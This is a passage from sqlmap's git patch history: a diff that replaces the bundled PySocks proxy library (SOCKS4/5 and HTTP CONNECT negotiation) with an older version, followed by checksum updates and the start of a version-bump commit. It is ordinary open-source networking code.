0x5B: "Request rejected or failed", - 0x5C: "Request rejected because SOCKS server cannot connect to identd on the client", - 0x5D: "Request rejected because the client program and identd report different user-ids" - } - -SOCKS5_ERRORS = { 0x01: "General SOCKS server failure", - 0x02: "Connection not allowed by ruleset", - 0x03: "Network unreachable", - 0x04: "Host unreachable", - 0x05: "Connection refused", - 0x06: "TTL expired", - 0x07: "Command not supported, or protocol error", - 0x08: "Address type not supported" - } - -DEFAULT_PORTS = { SOCKS4: 1080, - SOCKS5: 1080, - HTTP: 8080 - } - -def set_default_proxy(proxy_type=None, addr=None, port=None, rdns=True, username=None, password=None): - """ - set_default_proxy(proxy_type, addr[, port[, rdns[, username, password]]]) - +_generalerrors = ("success", + "invalid data", + "not connected", + "not available", + "bad proxy type", + "bad input") + +_socks5errors = ("succeeded", + "general SOCKS server failure", + "connection not allowed by ruleset", + "Network unreachable", + "Host unreachable", + "Connection refused", + "TTL expired", + "Command not supported", + "Address type not supported", + "Unknown error") + +_socks5autherrors = ("succeeded", + "authentication is required", + "all offered authentication methods were rejected", + "unknown username or invalid password", + "unknown error") + +_socks4errors = ("request granted", + "request rejected or failed", + "request rejected because SOCKS server cannot connect to identd on the client", + "request rejected because the client program and identd report different user-ids", + "unknown error") + +def setdefaultproxy(proxytype=None, addr=None, port=None, rdns=True, username=None, password=None): + """setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]]) Sets a default proxy which all further socksocket objects will use, - unless explicitly changed. All parameters are as for socket.set_proxy(). + unless explicitly changed. """ - socksocket.default_proxy = (proxy_type, addr, port, rdns, - username.encode() if username else None, - password.encode() if password else None) - -setdefaultproxy = set_default_proxy + global _defaultproxy + _defaultproxy = (proxytype, addr, port, rdns, username, password) -def get_default_proxy(): - """ - Returns the default proxy, set by set_default_proxy. - """ - return socksocket.default_proxy - -getdefaultproxy = get_default_proxy - -def wrap_module(module): - """ +def wrapmodule(module): + """wrapmodule(module) Attempts to replace a module's socket library with a SOCKS socket. Must set - a default proxy using set_default_proxy(...) first. + a default proxy using setdefaultproxy(...) first. This will only work on modules that import socket directly into the namespace; most of the Python Standard Library falls into this category. """ - if socksocket.default_proxy: + if _defaultproxy != None: module.socket.socket = socksocket + module.socket.create_connection = create_connection else: - raise GeneralProxyError("No default proxy specified") + raise GeneralProxyError((4, "no proxy specified")) -def unwrap_module(module): +def unwrapmodule(module): module.socket.socket = _orgsocket module.socket.create_connection = _orgcreateconnection -wrapmodule = wrap_module -unwrapmodule = unwrap_module - -def create_connection(dest_pair, proxy_type=None, proxy_addr=None, - proxy_port=None, proxy_rdns=True, - proxy_username=None, proxy_password=None, - timeout=None, source_address=None, - socket_options=None): - """create_connection(dest_pair, *[, timeout], **proxy_args) -> socket object - - Like socket.create_connection(), but connects to proxy - before returning the socket object. - - dest_pair - 2-tuple of (IP/hostname, port). - **proxy_args - Same args passed to socksocket.set_proxy() if present. - timeout - Optional socket timeout value, in seconds. - source_address - tuple (host, port) for the socket to bind to as its source - address before connecting (only for compatibility) - """ - # Remove IPv6 brackets on the remote address and proxy address. - remote_host, remote_port = dest_pair - if remote_host.startswith('['): - remote_host = remote_host.strip('[]') - if proxy_addr and proxy_addr.startswith('['): - proxy_addr = proxy_addr.strip('[]') - - err = None - - # Allow the SOCKS proxy to be on IPv4 or IPv6 addresses. - for r in socket.getaddrinfo(proxy_addr, proxy_port, 0, socket.SOCK_STREAM): - family, socket_type, proto, canonname, sa = r - sock = None - try: - sock = socksocket(family, socket_type, proto) - - if socket_options: - for opt in socket_options: - sock.setsockopt(*opt) - - if isinstance(timeout, (int, float)): - sock.settimeout(timeout) - - if proxy_type: - sock.set_proxy(proxy_type, proxy_addr, proxy_port, proxy_rdns, - proxy_username, proxy_password) - if source_address: - sock.bind(source_address) - - sock.connect((remote_host, remote_port)) - return sock - - except (socket.error, ProxyConnectionError) as e: - err = e - if sock: - sock.close() - sock = None - - if err: - raise err - - raise socket.error("gai returned empty list.") - -class _BaseSocket(socket.socket): - """Allows Python 2's "delegated" methods such as send() to be overridden - """ - def __init__(self, *pos, **kw): - _orig_socket.__init__(self, *pos, **kw) - - self._savedmethods = dict() - for name in self._savenames: - self._savedmethods[name] = getattr(self, name) - delattr(self, name) # Allows normal overriding mechanism to work - - _savenames = list() - -def _makemethod(name): - return lambda self, *pos, **kw: self._savedmethods[name](*pos, **kw) -for name in ("sendto", "send", "recvfrom", "recv"): - method = getattr(_BaseSocket, name, None) - - # Determine if the method is not defined the usual way - # as a function in the class. - # Python 2 uses __slots__, so there are descriptors for each method, - # but they are not functions. - if not isinstance(method, Callable): - _BaseSocket._savenames.append(name) - setattr(_BaseSocket, name, _makemethod(name)) - -class socksocket(_BaseSocket): +class socksocket(socket.socket): """socksocket([family[, type[, proto]]]) -> socket object - Open a SOCKS enabled socket. The parameters are the same as those of the standard socket init. In order for SOCKS to work, - you must specify family=AF_INET and proto=0. - The "type" argument must be either SOCK_STREAM or SOCK_DGRAM. + you must specify family=AF_INET, type=SOCK_STREAM and proto=0. """ - default_proxy = None - - def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, *args, **kwargs): - if type not in (socket.SOCK_STREAM, socket.SOCK_DGRAM): - msg = "Socket type must be stream or datagram, not {!r}" - raise ValueError(msg.format(type)) - - _BaseSocket.__init__(self, family, type, proto, *args, **kwargs) - self._proxyconn = None # TCP connection to keep UDP relay alive - - if self.default_proxy: - self.proxy = self.default_proxy + def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None): + _orgsocket.__init__(self, family, type, proto, _sock) + if _defaultproxy != None: + self.__proxy = _defaultproxy else: - self.proxy = (None, None, None, None, None, None) - self.proxy_sockname = None - self.proxy_peername = None + self.__proxy = (None, None, None, None, None, None) + self.__proxysockname = None + self.__proxypeername = None - def _readall(self, file, count): - """ - Receive EXACTLY the number of bytes requested from the file object. + def __recvall(self, count): + """__recvall(count) -> data + Receive EXACTLY the number of bytes requested from the socket. Blocks until the required number of bytes have been received. """ - data = b"" + data = self.recv(count) while len(data) < count: - d = file.read(count - len(data)) - if not d: - raise GeneralProxyError("Connection closed unexpectedly") - data += d + d = self.recv(count-len(data)) + if not d: raise GeneralProxyError((0, "connection closed unexpectedly")) + data = data + d return data - def set_proxy(self, proxy_type=None, addr=None, port=None, rdns=True, username=None, password=None): - """set_proxy(proxy_type, addr[, port[, rdns[, username[, password]]]]) + def setproxy(self, proxytype=None, addr=None, port=None, rdns=True, username=None, password=None): + """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]]) Sets the proxy to be used. - - proxy_type - The type of the proxy to be used. Three types - are supported: PROXY_TYPE_SOCKS4 (including socks4a), - PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP + proxytype - The type of the proxy to be used. Three types + are supported: PROXY_TYPE_SOCKS4 (including socks4a), + PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP addr - The address of the server (IP or DNS). port - The port of the server. Defaults to 1080 for SOCKS - servers and 8080 for HTTP proxy servers. - rdns - Should DNS queries be performed on the remote side - (rather than the local side). The default is True. - Note: This has no effect with SOCKS4 servers. + servers and 8080 for HTTP proxy servers. + rdns - Should DNS queries be preformed on the remote side + (rather than the local side). The default is True. + Note: This has no effect with SOCKS4 servers. username - Username to authenticate with to the server. - The default is no authentication. + The default is no authentication. password - Password to authenticate with to the server. - Only relevant when username is also provided. + Only relevant when username is also provided. """ - self.proxy = (proxy_type, addr, port, rdns, - username.encode() if username else None, - password.encode() if password else None) - - setproxy = set_proxy + self.__proxy = (proxytype, addr, port, rdns, username, password) - def bind(self, *pos, **kw): + def __negotiatesocks5(self, destaddr, destport): + """__negotiatesocks5(self,destaddr,destport) + Negotiates a connection through a SOCKS5 server. """ - Implements proxy connection for UDP sockets, - which happens during the bind() phase. - """ - proxy_type, proxy_addr, proxy_port, rdns, username, password = self.proxy - if not proxy_type or self.type != socket.SOCK_DGRAM: - return _orig_socket.bind(self, *pos, **kw) - - if self._proxyconn: - raise socket.error(EINVAL, "Socket already bound to an address") - if proxy_type != SOCKS5: - msg = "UDP only supported by SOCKS5 proxy type" - raise socket.error(EOPNOTSUPP, msg) - _BaseSocket.bind(self, *pos, **kw) - - # Need to specify actual local port because - # some relays drop packets if a port of zero is specified. - # Avoid specifying host address in case of NAT though. - _, port = self.getsockname() - dst = ("0", port) - - self._proxyconn = _orig_socket() - proxy = self._proxy_addr() - self._proxyconn.connect(proxy) - - UDP_ASSOCIATE = b"\x03" - _, relay = self._SOCKS5_request(self._proxyconn, UDP_ASSOCIATE, dst) - - # The relay is most likely on the same host as the SOCKS proxy, - # but some proxies return a private IP address (10.x.y.z) - host, _ = proxy - _, port = relay - _BaseSocket.connect(self, (host, port)) - self.proxy_sockname = ("0.0.0.0", 0) # Unknown - - def sendto(self, bytes, *args, **kwargs): - if self.type != socket.SOCK_DGRAM: - return _BaseSocket.sendto(self, bytes, *args, **kwargs) - if not self._proxyconn: - self.bind(("", 0)) - - address = args[-1] - flags = args[:-1] - - header = BytesIO() - RSV = b"\x00\x00" - header.write(RSV) - STANDALONE = b"\x00" - header.write(STANDALONE) - self._write_SOCKS5_address(address, header) - - sent = _BaseSocket.send(self, header.getvalue() + bytes, *flags, **kwargs) - return sent - header.tell() - - def send(self, bytes, flags=0, **kwargs): - if self.type == socket.SOCK_DGRAM: - return self.sendto(bytes, flags, self.proxy_peername, **kwargs) + # First we'll send the authentication packages we support. + if (self.__proxy[4]!=None) and (self.__proxy[5]!=None): + # The username/password details were supplied to the + # setproxy method so we support the USERNAME/PASSWORD + # authentication (in addition to the standard none). + self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02)) else: - return _BaseSocket.send(self, bytes, flags, **kwargs) - - def recvfrom(self, bufsize, flags=0): - if self.type != socket.SOCK_DGRAM: - return _BaseSocket.recvfrom(self, bufsize, flags) - if not self._proxyconn: - self.bind(("", 0)) - - buf = BytesIO(_BaseSocket.recv(self, bufsize, flags)) - buf.seek(+2, SEEK_CUR) - frag = buf.read(1) - if ord(frag): - raise NotImplementedError("Received UDP packet fragment") - fromhost, fromport = self._read_SOCKS5_address(buf) - - if self.proxy_peername: - peerhost, peerport = self.proxy_peername - if fromhost != peerhost or peerport not in (0, fromport): - raise socket.error(EAGAIN, "Packet filtered") - - return (buf.read(), (fromhost, fromport)) - - def recv(self, *pos, **kw): - bytes, _ = self.recvfrom(*pos, **kw) - return bytes - - def close(self): - if self._proxyconn: - self._proxyconn.close() - return _BaseSocket.close(self) - - def get_proxy_sockname(self): - """ + # No username/password were entered, therefore we + # only support connections with no authentication. + self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00)) + # We'll receive the server's response to determine which + # method was selected + chosenauth = self.__recvall(2) + if chosenauth[0:1] != chr(0x05).encode(): + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + # Check the chosen authentication method + if chosenauth[1:2] == chr(0x00).encode(): + # No authentication is required + pass + elif chosenauth[1:2] == chr(0x02).encode(): + # Okay, we need to perform a basic username/password + # authentication. + self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5]) + authstat = self.__recvall(2) + if authstat[0:1] != chr(0x01).encode(): + # Bad response + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + if authstat[1:2] != chr(0x00).encode(): + # Authentication failed + self.close() + raise Socks5AuthError((3, _socks5autherrors[3])) + # Authentication succeeded + else: + # Reaching here is always bad + self.close() + if chosenauth[1] == chr(0xFF).encode(): + raise Socks5AuthError((2, _socks5autherrors[2])) + else: + raise GeneralProxyError((1, _generalerrors[1])) + # Now we can request the actual connection + req = struct.pack('BBB', 0x05, 0x01, 0x00) + # If the given destination address is an IP address, we'll + # use the IPv4 address request even if remote resolving was specified. + try: + ipaddr = socket.inet_aton(destaddr) + req = req + chr(0x01).encode() + ipaddr + except socket.error: + # Well it's not an IP number, so it's probably a DNS name. + if self.__proxy[3]: + # Resolve remotely + ipaddr = None + req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + destaddr + else: + # Resolve locally + ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) + req = req + chr(0x01).encode() + ipaddr + req = req + struct.pack(">H", destport) + self.sendall(req) + # Get the response + resp = self.__recvall(4) + if resp[0:1] != chr(0x05).encode(): + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + elif resp[1:2] != chr(0x00).encode(): + # Connection failed + self.close() + if ord(resp[1:2])<=8: + raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])])) + else: + raise Socks5Error((9, _socks5errors[9])) + # Get the bound address/port + elif resp[3:4] == chr(0x01).encode(): + boundaddr = self.__recvall(4) + elif resp[3:4] == chr(0x03).encode(): + resp = resp + self.recv(1) + boundaddr = self.__recvall(ord(resp[4:5])) + else: + self.close() + raise GeneralProxyError((1,_generalerrors[1])) + boundport = struct.unpack(">H", self.__recvall(2))[0] + self.__proxysockname = (boundaddr, boundport) + if ipaddr != None: + self.__proxypeername = (socket.inet_ntoa(ipaddr), destport) + else: + self.__proxypeername = (destaddr, destport) + + def getproxysockname(self): + """getsockname() -> address info Returns the bound IP address and port number at the proxy. """ - return self.proxy_sockname + return self.__proxysockname - getproxysockname = get_proxy_sockname - - def get_proxy_peername(self): - """ + def getproxypeername(self): + """getproxypeername() -> address info Returns the IP and port number of the proxy. """ - return _BaseSocket.getpeername(self) + return _orgsocket.getpeername(self) - getproxypeername = get_proxy_peername - - def get_peername(self): - """ + def getpeername(self): + """getpeername() -> address info Returns the IP address and port number of the destination - machine (note: get_proxy_peername returns the proxy) - """ - return self.proxy_peername - - getpeername = get_peername - - def _negotiate_SOCKS5(self, *dest_addr): - """ - Negotiates a stream connection through a SOCKS5 server. - """ - CONNECT = b"\x01" - self.proxy_peername, self.proxy_sockname = self._SOCKS5_request(self, - CONNECT, dest_addr) - - def _SOCKS5_request(self, conn, cmd, dst): - """ - Send SOCKS5 request with given command (CMD field) and - address (DST field). Returns resolved DST address that was used. + machine (note: getproxypeername returns the proxy) """ - proxy_type, addr, port, rdns, username, password = self.proxy + return self.__proxypeername - writer = conn.makefile("wb") - reader = conn.makefile("rb", 0) # buffering=0 renamed in Python 3 - try: - # First we'll send the authentication packages we support. - if username and password: - # The username/password details were supplied to the - # set_proxy method so we support the USERNAME/PASSWORD - # authentication (in addition to the standard none). - writer.write(b"\x05\x02\x00\x02") - else: - # No username/password were entered, therefore we - # only support connections with no authentication. - writer.write(b"\x05\x01\x00") - - # We'll receive the server's response to determine which - # method was selected - writer.flush() - chosen_auth = self._readall(reader, 2) - - if chosen_auth[0:1] != b"\x05": - # Note: string[i:i+1] is used because indexing of a bytestring - # via bytestring[i] yields an integer in Python 3 - raise GeneralProxyError("SOCKS5 proxy server sent invalid data") - - # Check the chosen authentication method - - if chosen_auth[1:2] == b"\x02": - # Okay, we need to perform a basic username/password - # authentication. - writer.write(b"\x01" + chr(len(username)).encode() - + username - + chr(len(password)).encode() - + password) - writer.flush() - auth_status = self._readall(reader, 2) - if auth_status[0:1] != b"\x01": - # Bad response - raise GeneralProxyError("SOCKS5 proxy server sent invalid data") - if auth_status[1:2] != b"\x00": - # Authentication failed - raise SOCKS5AuthError("SOCKS5 authentication failed") - - # Otherwise, authentication succeeded - - # No authentication is required if 0x00 - elif chosen_auth[1:2] != b"\x00": - # Reaching here is always bad - if chosen_auth[1:2] == b"\xFF": - raise SOCKS5AuthError("All offered SOCKS5 authentication methods were rejected") - else: - raise GeneralProxyError("SOCKS5 proxy server sent invalid data") - - # Now we can request the actual connection - writer.write(b"\x05" + cmd + b"\x00") - resolved = self._write_SOCKS5_address(dst, writer) - writer.flush() - - # Get the response - resp = self._readall(reader, 3) - if resp[0:1] != b"\x05": - raise GeneralProxyError("SOCKS5 proxy server sent invalid data") - - status = ord(resp[1:2]) - if status != 0x00: - # Connection failed: server returned an error - error = SOCKS5_ERRORS.get(status, "Unknown error") - raise SOCKS5Error("{0:#04x}: {1}".format(status, error)) - - # Get the bound address/port - bnd = self._read_SOCKS5_address(reader) - return (resolved, bnd) - finally: - reader.close() - writer.close() - - def _write_SOCKS5_address(self, addr, file): - """ - Return the host and port packed for the SOCKS5 protocol, - and the resolved address as a tuple object. - """ - host, port = addr - proxy_type, _, _, rdns, username, password = self.proxy - family_to_byte = {socket.AF_INET: b"\x01", socket.AF_INET6: b"\x04"} - - # If the given destination address is an IP address, we'll - # use the IP address request even if remote resolving was specified. - # Detect whether the address is IPv4/6 directly. - for family in (socket.AF_INET, socket.AF_INET6): - try: - addr_bytes = socket.inet_pton(family, host) - file.write(family_to_byte[family] + addr_bytes) - host = socket.inet_ntop(family, addr_bytes) - file.write(struct.pack(">H", port)) - return host, port - except socket.error: - continue - - # Well it's not an IP number, so it's probably a DNS name. - if rdns: - # Resolve remotely - host_bytes = host.encode('idna') - file.write(b"\x03" + chr(len(host_bytes)).encode() + host_bytes) - else: - # Resolve locally - addresses = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM, socket.IPPROTO_TCP, socket.AI_ADDRCONFIG) - # We can't really work out what IP is reachable, so just pick the - # first. - target_addr = addresses[0] - family = target_addr[0] - host = target_addr[4][0] - - addr_bytes = socket.inet_pton(family, host) - file.write(family_to_byte[family] + addr_bytes) - host = socket.inet_ntop(family, addr_bytes) - file.write(struct.pack(">H", port)) - return host, port - - def _read_SOCKS5_address(self, file): - atyp = self._readall(file, 1) - if atyp == b"\x01": - addr = socket.inet_ntoa(self._readall(file, 4)) - elif atyp == b"\x03": - length = self._readall(file, 1) - addr = self._readall(file, ord(length)) - elif atyp == b"\x04": - addr = socket.inet_ntop(socket.AF_INET6, self._readall(file, 16)) - else: - raise GeneralProxyError("SOCKS5 proxy server sent invalid data") - - port = struct.unpack(">H", self._readall(file, 2))[0] - return addr, port - - def _negotiate_SOCKS4(self, dest_addr, dest_port): - """ + def __negotiatesocks4(self,destaddr,destport): + """__negotiatesocks4(self,destaddr,destport) Negotiates a connection through a SOCKS4 server. """ - proxy_type, addr, port, rdns, username, password = self.proxy - - writer = self.makefile("wb") - reader = self.makefile("rb", 0) # buffering=0 renamed in Python 3 + # Check if the destination address provided is an IP address + rmtrslv = False try: - # Check if the destination address provided is an IP address - remote_resolve = False - try: - addr_bytes = socket.inet_aton(dest_addr) - except socket.error: - # It's a DNS name. Check where it should be resolved. - if rdns: - addr_bytes = b"\x00\x00\x00\x01" - remote_resolve = True - else: - addr_bytes = socket.inet_aton(socket.gethostbyname(dest_addr)) - - # Construct the request packet - writer.write(struct.pack(">BBH", 0x04, 0x01, dest_port)) - writer.write(addr_bytes) - - # The username parameter is considered userid for SOCKS4 - if username: - writer.write(username) - writer.write(b"\x00") - - # DNS name if remote resolving is required - # NOTE: This is actually an extension to the SOCKS4 protocol - # called SOCKS4A and may not be supported in all cases. - if remote_resolve: - writer.write(dest_addr.encode('idna') + b"\x00") - writer.flush() - - # Get the response from the server - resp = self._readall(reader, 8) - if resp[0:1] != b"\x00": - # Bad data - raise GeneralProxyError("SOCKS4 proxy server sent invalid data") - - status = ord(resp[1:2]) - if status != 0x5A: - # Connection failed: server returned an error - error = SOCKS4_ERRORS.get(status, "Unknown error") - raise SOCKS4Error("{0:#04x}: {1}".format(status, error)) - - # Get the bound address/port - self.proxy_sockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0]) - if remote_resolve: - self.proxy_peername = socket.inet_ntoa(addr_bytes), dest_port + ipaddr = socket.inet_aton(destaddr) + except socket.error: + # It's a DNS name. Check where it should be resolved. + if self.__proxy[3]: + ipaddr = struct.pack("BBBB", 0x00, 0x00, 0x00, 0x01) + rmtrslv = True else: - self.proxy_peername = dest_addr, dest_port - finally: - reader.close() - writer.close() + ipaddr = socket.inet_aton(socket.gethostbyname(destaddr)) + # Construct the request packet + req = struct.pack(">BBH", 0x04, 0x01, destport) + ipaddr + # The username parameter is considered userid for SOCKS4 + if self.__proxy[4] != None: + req = req + self.__proxy[4] + req = req + chr(0x00).encode() + # DNS name if remote resolving is required + # NOTE: This is actually an extension to the SOCKS4 protocol + # called SOCKS4A and may not be supported in all cases. + if rmtrslv: + req = req + destaddr + chr(0x00).encode() + self.sendall(req) + # Get the response from the server + resp = self.__recvall(8) + if resp[0:1] != chr(0x00).encode(): + # Bad data + self.close() + raise GeneralProxyError((1,_generalerrors[1])) + if resp[1:2] != chr(0x5A).encode(): + # Server returned an error + self.close() + if ord(resp[1:2]) in (91, 92, 93): + self.close() + raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90])) + else: + raise Socks4Error((94, _socks4errors[4])) + # Get the bound address/port + self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(">H", resp[2:4])[0]) + if rmtrslv != None: + self.__proxypeername = (socket.inet_ntoa(ipaddr), destport) + else: + self.__proxypeername = (destaddr, destport) - def _negotiate_HTTP(self, dest_addr, dest_port): - """ + def __negotiatehttp(self, destaddr, destport): + """__negotiatehttp(self,destaddr,destport) Negotiates a connection through an HTTP server. - NOTE: This currently only supports HTTP CONNECT-style proxies. """ - proxy_type, addr, port, rdns, username, password = self.proxy - # If we need to resolve locally, we do this now - addr = dest_addr if rdns else socket.gethostbyname(dest_addr) - - http_headers = [ - b"CONNECT " + addr.encode('idna') + b":" + str(dest_port).encode() + b" HTTP/1.1", - b"Host: " + dest_addr.encode('idna') - ] - - if username and password: - http_headers.append(b"Proxy-Authorization: basic " + b64encode(username + b":" + password)) - - http_headers.append(b"\r\n") - - self.sendall(b"\r\n".join(http_headers)) - - # We just need the first line to check if the connection was successful - fobj = self.makefile() - status_line = fobj.readline() - fobj.close() - - if not status_line: - raise GeneralProxyError("Connection closed unexpectedly") - - try: - proto, status_code, status_msg = status_line.split(" ", 2) - except ValueError: - raise GeneralProxyError("HTTP proxy server sent invalid response") - - if not proto.startswith("HTTP/"): - raise GeneralProxyError("Proxy server does not appear to be an HTTP proxy") - + if not self.__proxy[3]: + addr = socket.gethostbyname(destaddr) + else: + addr = destaddr + self.sendall(("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n").encode()) + # We read the response until we get the string "\r\n\r\n" + resp = self.recv(1) + while resp.find("\r\n\r\n".encode()) == -1: + resp = resp + self.recv(1) + # We just need the first line to check if the connection + # was successful + statusline = resp.splitlines()[0].split(" ".encode(), 2) + if statusline[0] not in ("HTTP/1.0".encode(), "HTTP/1.1".encode()): + self.close() + raise GeneralProxyError((1, _generalerrors[1])) try: - status_code = int(status_code) + statuscode = int(statusline[1]) except ValueError: - raise HTTPError("HTTP proxy server did not return a valid HTTP status") - - if status_code != 200: - error = "{0}: {1}".format(status_code, status_msg) - if status_code in (400, 403, 405): - # It's likely that the HTTP proxy server does not support the CONNECT tunneling method - error += ("\n[*] Note: The HTTP proxy server may not be supported by PySocks" - " (must be a CONNECT tunnel proxy)") - raise HTTPError(error) - - self.proxy_sockname = (b"0.0.0.0", 0) - self.proxy_peername = addr, dest_port - - _proxy_negotiators = { - SOCKS4: _negotiate_SOCKS4, - SOCKS5: _negotiate_SOCKS5, - HTTP: _negotiate_HTTP - } - + self.close() + raise GeneralProxyError((1, _generalerrors[1])) + if statuscode != 200: + self.close() + raise HTTPError((statuscode, statusline[2])) + self.__proxysockname = ("0.0.0.0", 0) + self.__proxypeername = (addr, destport) - def connect(self, dest_pair): - """ + def connect(self, destpair): + """connect(self, despair) Connects to the specified destination through a proxy. - Uses the same API as socket's connect(). - To select the proxy server, use set_proxy(). - - dest_pair - 2-tuple of (IP/hostname, port). + destpar - A tuple of the IP/DNS address and the port number. + (identical to socket's connect). + To select the proxy server use setproxy(). """ - if len(dest_pair) != 2 or dest_pair[0].startswith("["): - # Probably IPv6, not supported -- raise an error, and hope - # Happy Eyeballs (RFC6555) makes sure at least the IPv4 - # connection works... - raise socket.error("PySocks doesn't support IPv6") - - dest_addr, dest_port = dest_pair - - if self.type == socket.SOCK_DGRAM: - if not self._proxyconn: - self.bind(("", 0)) - dest_addr = socket.gethostbyname(dest_addr) - - # If the host address is INADDR_ANY or similar, reset the peer - # address so that packets are received from any peer - if dest_addr == "0.0.0.0" and not dest_port: - self.proxy_peername = None - else: - self.proxy_peername = (dest_addr, dest_port) - return - - proxy_type, proxy_addr, proxy_port, rdns, username, password = self.proxy - # Do a minimal input check first - if (not isinstance(dest_pair, (list, tuple)) - or len(dest_pair) != 2 - or not dest_addr - or not isinstance(dest_port, int)): - raise GeneralProxyError("Invalid destination-connection (host, port) pair") - - - if proxy_type is None: - # Treat like regular socket object - self.proxy_peername = dest_pair - _BaseSocket.connect(self, (dest_addr, dest_port)) - return - - proxy_addr = self._proxy_addr() - - try: - # Initial connection to proxy server - _BaseSocket.connect(self, proxy_addr) - - except socket.error as error: - # Error while connecting to proxy - self.close() - proxy_addr, proxy_port = proxy_addr - proxy_server = "{0}:{1}".format(proxy_addr, proxy_port) - printable_type = PRINTABLE_PROXY_TYPES[proxy_type] - - msg = "Error connecting to {0} proxy {1}".format(printable_type, - proxy_server) - raise ProxyConnectionError(msg, error) - + if (not type(destpair) in (list,tuple)) or (len(destpair) < 2) or (type(destpair[0]) != type('')) or (type(destpair[1]) != int): + raise GeneralProxyError((5, _generalerrors[5])) + if self.__proxy[0] == PROXY_TYPE_SOCKS5: + if self.__proxy[2] != None: + portnum = self.__proxy[2] + else: + portnum = 1080 + _orgsocket.connect(self, (self.__proxy[1], portnum)) + self.__negotiatesocks5(destpair[0], destpair[1]) + elif self.__proxy[0] == PROXY_TYPE_SOCKS4: + if self.__proxy[2] != None: + portnum = self.__proxy[2] + else: + portnum = 1080 + _orgsocket.connect(self,(self.__proxy[1], portnum)) + self.__negotiatesocks4(destpair[0], destpair[1]) + elif self.__proxy[0] == PROXY_TYPE_HTTP: + if self.__proxy[2] != None: + portnum = self.__proxy[2] + else: + portnum = 8080 + _orgsocket.connect(self,(self.__proxy[1], portnum)) + self.__negotiatehttp(destpair[0], destpair[1]) + elif self.__proxy[0] == None: + _orgsocket.connect(self, (destpair[0], destpair[1])) else: - # Connected to proxy server, now negotiate - try: - # Calls negotiate_{SOCKS4, SOCKS5, HTTP} - negotiate = self._proxy_negotiators[proxy_type] - negotiate(self, dest_addr, dest_port) - except socket.error as error: - # Wrap socket errors - self.close() - raise GeneralProxyError("Socket error", error) - except ProxyError: - # Protocol error while negotiating with proxy - self.close() - raise - - def _proxy_addr(self): - """ - Return proxy address to connect to as tuple object - """ - proxy_type, proxy_addr, proxy_port, rdns, username, password = self.proxy - proxy_port = proxy_port or DEFAULT_PORTS.get(proxy_type) - if not proxy_port: - raise GeneralProxyError("Invalid proxy type") - return proxy_addr, proxy_port + raise GeneralProxyError((4, _generalerrors[4])) + +def create_connection(address, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, + source_address=None): + # Patched for a DNS-leakage + host, port = address + sock = None + try: + sock = socksocket(socket.AF_INET, socket.SOCK_STREAM) + if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT: + sock.settimeout(timeout) + if source_address: + sock.bind(source_address) + sock.connect(address) + except socket.error: + if sock is not None: + sock.close() + raise + return sock diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8b0280b75a4..fd8bcc9e5bd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2adfff188eafd6ea877686823cb44eb9 lib/core/settings.py +2c8a4dcbdeec825ded4f27bd727379e5 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -356,7 +356,7 @@ ff80a22ee858f5331b0c088efa98b3ff thirdparty/prettyprint/prettyprint.py 5c70f8e5f7353aedc6d8d21d4fb72b37 thirdparty/pydes/__init__.py a7f735641c5b695f3d6220fe7c91b030 thirdparty/pydes/pyDes.py d41d8cd98f00b204e9800998ecf8427e thirdparty/socks/__init__.py -74fcae36f5a2cc440c1717ae8e3f64c4 thirdparty/socks/socks.py +afd97f26bffa0532ee4eb4f5f8ec1ab7 thirdparty/socks/socks.py d41d8cd98f00b204e9800998ecf8427e thirdparty/termcolor/__init__.py ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py bf55909ad163b58236e44b86e8441b26 thirdparty/wininetpton/__init__.py From eb498e6c03d55c273f2a0018185d4db0e0f87662 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 29 May 2018 14:54:43 +0200 Subject: [PATCH 148/428] Fixes #2819 --- lib/core/settings.py | 2 +- lib/request/basic.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1539dcd392b..65c3e8f975c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.22" +VERSION = "1.2.5.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/basic.py b/lib/request/basic.py index 